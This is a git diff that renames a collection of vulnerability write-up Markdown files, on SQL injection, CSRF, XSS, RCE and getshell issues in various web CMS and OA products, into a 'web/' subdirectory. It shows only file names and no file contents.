diff --git "a/S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
similarity index 100%
rename from "S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
rename to "web/S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
diff --git "a/S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md" "b/web/S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md"
similarity index 100%
rename from "S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md"
rename to "web/S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md"
diff --git "a/ThinkCMF\346\274\217\346\264\236\345\205\250\351\233\206\345\222\214.md" "b/web/ThinkCMF\346\274\217\346\264\236\345\205\250\351\233\206\345\222\214.md"
similarity index 100%
rename from "ThinkCMF\346\274\217\346\264\236\345\205\250\351\233\206\345\222\214.md"
rename to "web/ThinkCMF\346\274\217\346\264\236\345\205\250\351\233\206\345\222\214.md"
diff --git "a/WDJACMS1.5.2\346\250\241\346\235\277\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/WDJACMS1.5.2\346\250\241\346\235\277\346\263\250\345\205\245\346\274\217\346\264\236.md"
similarity index 100%
rename from "WDJACMS1.5.2\346\250\241\346\235\277\346\263\250\345\205\245\346\274\217\346\264\236.md"
rename to "web/WDJACMS1.5.2\346\250\241\346\235\277\346\263\250\345\205\245\346\274\217\346\264\236.md"
diff --git "a/YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" "b/web/YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md"
similarity index 100%
rename from "YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md"
rename to "web/YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md"
diff --git "a/Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" "b/web/Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md"
similarity index 100%
rename from "Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md"
rename to "web/Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md"
diff --git a/ZZCMS201910 SQL Injections.md b/web/ZZCMS201910 SQL Injections.md
similarity index 100%
rename from ZZCMS201910 SQL Injections.md
rename to web/ZZCMS201910 SQL Injections.md
diff --git "a/Zblog\351\273\230\350\256\244Theme_csrf+\345\202\250\345\255\230xss+getshell.md" "b/web/Zblog\351\273\230\350\256\244Theme_csrf+\345\202\250\345\255\230xss+getshell.md"
similarity index 100%
rename from "Zblog\351\273\230\350\256\244Theme_csrf+\345\202\250\345\255\230xss+getshell.md"
rename to "web/Zblog\351\273\230\350\256\244Theme_csrf+\345\202\250\345\255\230xss+getshell.md"
diff --git "a/cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272\351\231\204PoC.md" "b/web/cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272\351\231\204PoC.md"
similarity index 100%
rename from "cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272\351\231\204PoC.md"
rename to "web/cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272\351\231\204PoC.md"
diff --git "a/freeFTP1.0.8-'PASS'\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272.md" "b/web/freeFTP1.0.8-'PASS'\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272.md"
similarity index 100%
rename from "freeFTP1.0.8-'PASS'\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272.md"
rename to "web/freeFTP1.0.8-'PASS'\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272.md"
diff --git "a/indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md" "b/web/indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md"
similarity index 100%
rename from "indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md"
rename to "web/indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md"
diff --git "a/joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
similarity index 100%
rename from "joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
rename to "web/joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
diff --git "a/maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md" "b/web/maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md"
similarity index 100%
rename from "maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md"
rename to "web/maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md"
diff --git "a/rConfig v3.9.2 RCE\346\274\217\346\264\236.md" "b/web/rConfig v3.9.2 RCE\346\274\217\346\264\236.md"
similarity index 100%
rename from "rConfig v3.9.2 RCE\346\274\217\346\264\236.md"
rename to "web/rConfig v3.9.2 RCE\346\274\217\346\264\236.md"
diff --git "a/showdoc\347\232\204api_page\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240getshell.md" "b/web/showdoc\347\232\204api_page\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240getshell.md"
similarity index 100%
rename from "showdoc\347\232\204api_page\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240getshell.md"
rename to "web/showdoc\347\232\204api_page\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240getshell.md"
diff --git a/solr_rce.md b/web/solr_rce.md
similarity index 100%
rename from solr_rce.md
rename to web/solr_rce.md
diff --git "a/thinkphp5\345\221\275\344\273\244\346\211\247\350\241\214.md" "b/web/thinkphp5\345\221\275\344\273\244\346\211\247\350\241\214.md"
similarity index 100%
rename from "thinkphp5\345\221\275\344\273\244\346\211\247\350\241\214.md"
rename to "web/thinkphp5\345\221\275\344\273\244\346\211\247\350\241\214.md"
diff --git "a/thinkphp5\346\241\206\346\236\266\347\274\272\351\231\267\345\257\274\350\207\264\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214.md" "b/web/thinkphp5\346\241\206\346\236\266\347\274\272\351\231\267\345\257\274\350\207\264\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214.md"
similarity index 100%
rename from "thinkphp5\346\241\206\346\236\266\347\274\272\351\231\267\345\257\274\350\207\264\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214.md"
rename to "web/thinkphp5\346\241\206\346\236\266\347\274\272\351\231\267\345\257\274\350\207\264\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214.md"
diff --git "a/typecho\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md" "b/web/typecho\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md"
similarity index 100%
rename from "typecho\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md"
rename to "web/typecho\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md"
diff --git "a/yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" "b/web/yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md"
similarity index 100%
rename from "yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md"
rename to "web/yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md"
diff --git "a/zzzcms(asp)\345\211\215\345\217\260Getshell.md" "b/web/zzzcms(asp)\345\211\215\345\217\260Getshell.md"
similarity index 100%
rename from "zzzcms(asp)\345\211\215\345\217\260Getshell.md"
rename to "web/zzzcms(asp)\345\211\215\345\217\260Getshell.md"
diff --git "a/\343\200\2200day RCE\343\200\221Horde Groupware Webmail Edition RCE.md" "b/web/\343\200\2200day RCE\343\200\221Horde Groupware Webmail Edition RCE.md"
similarity index 100%
rename from "\343\200\2200day RCE\343\200\221Horde Groupware Webmail Edition RCE.md"
rename to "web/\343\200\2200day RCE\343\200\221Horde Groupware Webmail Edition RCE.md"
diff --git "a/\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
similarity index 100%
rename from "\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
rename to "web/\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
diff --git "a/\345\277\253\351\200\237\345\210\244\346\226\255sql\346\263\250\345\205\245\347\202\271\346\230\257\345\220\246\346\224\257\346\214\201load_file.md" "b/web/\345\277\253\351\200\237\345\210\244\346\226\255sql\346\263\250\345\205\245\347\202\271\346\230\257\345\220\246\346\224\257\346\214\201load_file.md"
similarity index 100%
rename from "\345\277\253\351\200\237\345\210\244\346\226\255sql\346\263\250\345\205\245\347\202\271\346\230\257\345\220\246\346\224\257\346\214\201load_file.md"
rename to "web/\345\277\253\351\200\237\345\210\244\346\226\255sql\346\263\250\345\205\245\347\202\271\346\230\257\345\220\246\346\224\257\346\214\201load_file.md"
diff --git "a/\346\236\204\345\273\272ASMX\347\273\225\350\277\207\351\231\220\345\210\266WAF\350\276\276\345\210\260\345\221\275\344\273\244\346\211\247\350\241\214.md" "b/web/\346\236\204\345\273\272ASMX\347\273\225\350\277\207\351\231\220\345\210\266WAF\350\276\276\345\210\260\345\221\275\344\273\244\346\211\247\350\241\214.md"
similarity index 100%
rename from "\346\236\204\345\273\272ASMX\347\273\225\350\277\207\351\231\220\345\210\266WAF\350\276\276\345\210\260\345\221\275\344\273\244\346\211\247\350\241\214.md"
rename to "web/\346\236\204\345\273\272ASMX\347\273\225\350\277\207\351\231\220\345\210\266WAF\350\276\276\345\210\260\345\221\275\344\273\244\346\211\247\350\241\214.md"
diff --git "a/\346\263\233\345\276\256 e-cology OA \345\211\215\345\217\260SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/\346\263\233\345\276\256 e-cology OA \345\211\215\345\217\260SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
similarity index 100%
rename from "\346\263\233\345\276\256 e-cology OA \345\211\215\345\217\260SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
rename to "web/\346\263\233\345\276\256 e-cology OA \345\211\215\345\217\260SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
diff --git "a/\346\263\233\345\276\256OA\347\256\241\347\220\206\347\263\273\347\273\237RCE\346\274\217\346\264\236\345\210\251\347\224\250\350\204\232\346\234\254.md" "b/web/\346\263\233\345\276\256OA\347\256\241\347\220\206\347\263\273\347\273\237RCE\346\274\217\346\264\236\345\210\251\347\224\250\350\204\232\346\234\254.md"
similarity index 100%
rename from "\346\263\233\345\276\256OA\347\256\241\347\220\206\347\263\273\347\273\237RCE\346\274\217\346\264\236\345\210\251\347\224\250\350\204\232\346\234\254.md"
rename to "web/\346\263\233\345\276\256OA\347\256\241\347\220\206\347\263\273\347\273\237RCE\346\274\217\346\264\236\345\210\251\347\224\250\350\204\232\346\234\254.md"
diff --git "a/\346\263\233\345\276\256e-mobile ognl\346\263\250\345\205\245.md" "b/web/\346\263\233\345\276\256e-mobile ognl\346\263\250\345\205\245.md"
similarity index 100%
rename from "\346\263\233\345\276\256e-mobile ognl\346\263\250\345\205\245.md"
rename to "web/\346\263\233\345\276\256e-mobile ognl\346\263\250\345\205\245.md"
diff --git "a/\350\207\264\350\277\234OA_A8_getshell_0day.md" "b/web/\350\207\264\350\277\234OA_A8_getshell_0day.md"
similarity index 100%
rename from "\350\207\264\350\277\234OA_A8_getshell_0day.md"
rename to "web/\350\207\264\350\277\234OA_A8_getshell_0day.md"
diff --git "a/\351\200\232\350\276\276OA\345\211\215\345\217\260\344\273\273\346\204\217\347\224\250\346\210\267\344\274\252\351\200\240\347\231\273\345\275\225\346\274\217\346\264\236\346\211\271\351\207\217\346\243\200\346\265\213.md" "b/web/\351\200\232\350\276\276OA\345\211\215\345\217\260\344\273\273\346\204\217\347\224\250\346\210\267\344\274\252\351\200\240\347\231\273\345\275\225\346\274\217\346\264\236\346\211\271\351\207\217\346\243\200\346\265\213.md"
similarity index 100%
rename from "\351\200\232\350\276\276OA\345\211\215\345\217\260\344\273\273\346\204\217\347\224\250\346\210\267\344\274\252\351\200\240\347\231\273\345\275\225\346\274\217\346\264\236\346\211\271\351\207\217\346\243\200\346\265\213.md"
rename to "web/\351\200\232\350\276\276OA\345\211\215\345\217\260\344\273\273\346\204\217\347\224\250\346\210\267\344\274\252\351\200\240\347\231\273\345\275\225\346\274\217\346\264\236\346\211\271\351\207\217\346\243\200\346\265\213.md"
diff --git "a/\351\200\232\350\277\207phpinfo\350\216\267\345\217\226cookie\347\252\201\347\240\264httponly.md" "b/web/\351\200\232\350\277\207phpinfo\350\216\267\345\217\226cookie\347\252\201\347\240\264httponly.md"
similarity index 100%
rename from "\351\200\232\350\277\207phpinfo\350\216\267\345\217\226cookie\347\252\201\347\240\264httponly.md"
rename to "web/\351\200\232\350\277\207phpinfo\350\216\267\345\217\226cookie\347\252\201\347\240\264httponly.md"